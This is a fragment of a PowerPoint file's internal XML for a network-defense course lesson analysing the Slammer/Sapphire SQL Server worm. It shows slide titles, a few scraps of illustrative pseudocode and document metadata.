              <a:t>code is something like..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if(FIRST_BYTE &gt;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if (FIRST_BYTE == 9)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e9;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FIRST_BYTE = FIRST_BYTE - 2;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if(FIRST_BYTE &gt; 6)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should never get here!!!!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+ 4 * FIRST_BYTE;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cmdptr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12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USED_PAGE_ORIENTATION" val="1"/>
  <p:tag name="ARTICULATE_USED_PAGE_SIZE" val="1"/>
  <p:tag name="ARTICULATE_PRESENTATION_ID" val="331246"/>
  <p:tag name="ARTICULATE_PROJECT_CHECK" val="0"/>
  <p:tag name="TAG_BACKING_FORM_KEY" val="16519558-k:\cnap\netsec course\lectures\module_1\lesson 1 networking overview.pptx"/>
  <p:tag name="ARTICULATE_PRESENTER_VERSION" val="8"/>
  <p:tag name="ARTICULATE_PROJECT_OPEN" val="0"/>
  <p:tag name="ARTICULATE_SLIDE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2704</TotalTime>
  <Words>1825</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>301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PP_C5Modules_CC_License_standard</vt:lpstr>
      <vt:lpstr>Module: Network Defense</vt:lpstr>
      <vt:lpstr>Internetworking Module</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Sapphire/Slammer Worm Attribution</vt:lpstr>
      <vt:lpstr>Slammer Worm Speed</vt:lpstr>
      <vt:lpstr>Slammer Worm Notes</vt:lpstr>
      <vt:lpstr>Slammer Worm Analysis</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Function Calls and Buffer Overflow</vt:lpstr>
      <vt:lpstr>Slammer Worm</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Stack 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Slammer Worm Insides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250</cp:revision>
  <cp:lastPrinted>2016-07-18T16:40:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-07-03T20:12:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-13T17:22:53Z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2925794F-5522-4D9F-91B7-B0EEE976CE32</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ArticulateProjectFull">
    <vt:lpwstr>G:\CNAP\Deliverables\NetSec\Module_3 Network Defense\SlammerWorm.ppta</vt:lpwstr>
  </property>
</Properties>
</file>